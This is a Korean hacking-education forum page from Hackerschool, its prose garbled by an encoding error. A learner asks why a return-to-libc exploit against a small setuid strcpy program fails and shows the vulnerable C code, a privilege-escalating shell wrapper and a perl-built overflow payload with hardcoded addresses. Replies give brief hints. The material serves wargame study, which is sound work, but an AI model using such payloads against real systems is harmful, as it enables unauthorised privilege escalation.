ý ŷ

 1574, 1/79 ȸ  α  
   randomkid
   ȶ ϴ. е ּ .Ф

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=615 []


ް ÿ÷ο ߿ return into libcκԴϴ.

ϴ ̵ level9 ؼ
ϴ.(ϸ vul.c)
int main(int argc,char *argv[])
{
      char buf[7];
      strcpy(buf,argv[1]);
      return 0;
}
chmod u+s vul ɾϴ.

level11 ؼ
shell.c ۼ߽ϴ.

int main()
{
  setreuid(geteuid(),geteuid());
  setregid(getegid(),getegid());

  execl("/bin/bash","sh",0);
}
execl libcġ ˾Ƴ½ϴ.(0x400d16c0)
׸ gdb vul  ܺ ּҰ ˾Ƴ½ϴ.(0xbffffb34)

׷ ڵ带 ־ϴ.
./vul `perl -e 'print "A"x24,"\x34\xfb\xff\xbf","\xc3\x16\x0d\x40"," ./shell"'`
׷ ׸Ʈ Ʈ ڲ ϴ. .

gdb r `perl -e 'print "A"x24,"\x34\xfb\xff\xbf","\xc3\x16\x0d\x40"," ./shell"'`̷ ְ ϳ Ȯغôµ
ebp 0xbffffb34  巹 κп execl ° Ȯߴµ ȵ˴ϴ. .

̰ 3° ֽϴ. лε ̷ ϱ Դϴ.

α׷ ϳ ϴ.( غýϴ.)

ƹ ص øϴ. Ź帳ϴ.




  Hit : 3379     Date : 2006/09/04 05:30



    
bugfixer2 ׸Ʈ ߽Ŵٸ.. 'A'x24 κ ĺôٺ ? .. ּҰ ȮҰ 2006/09/09  
awsedr45 aX24 system(ּ) exit(ּ) bin/sh(ּ) 2006/09/09  
awsedr45 ƴϸ ps -a ɾ غ bash 2006/09/09  
1574   pwnable.kr echo1 2 ( )[2]     turttle2s
10/05 1236
1573   LOB GATE Ǯ鼭 ñ[3]     hackxx123
08/24 936
1572   libc - 2[5]     lMaxl04
08/24 882
1571   ASLR ɷ ret ROP jmp %esp .[3]     lMaxl04
06/29 1146
1570   Ʈ ȯ濡 ּ Ȯ ñմϴ.[2]     lMaxl04
06/16 943
1569   ŷ ?[1]     terfkim
04/15 1722
1568   ÿ SIGSEGV[4]     turttle2s
02/04 1452
1567   pwnable.kr echo1 [2]     turttle2s
06/17 1726
1566   ROP strcpy Դϴ.[3]     heeyoung0511
06/16 1572
1565   Level2 -> Level3 vi /usr/bin/Editor [2]     hyemin1826
07/18 1841
1564   Trainer3 ftz.hackerschool.org ȣƮ Ұ[1]     hyemin1826
07/18 3216
1563   dll 帳ϴ.[1]     kkk477
05/31 1847
1562   Ŷ ȣȭ Ϸ  ־ϳ?     sa0814
04/01 1692
1561   [2]     jas08
03/31 1991
1560   ý ޸ Ұ ޸ ϳ?     ocal
03/30 1732
1559   pwntools ÿ ⺻ socket ̿ ?[4]     ocal
01/09 2272
1558   lob level19(nightmare) [1]     dnjsdnwja
12/18 1739
1557   ftz level2 ֽϴ[1]     kihyun1998
12/13 1829
1556   ftz level2 Ǫµ ...     kihyun1998
12/06 1705
1555   ýŷҶ [3]     thsrhkdwns
12/05 2187
1 [2][3][4][5][6][7][8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org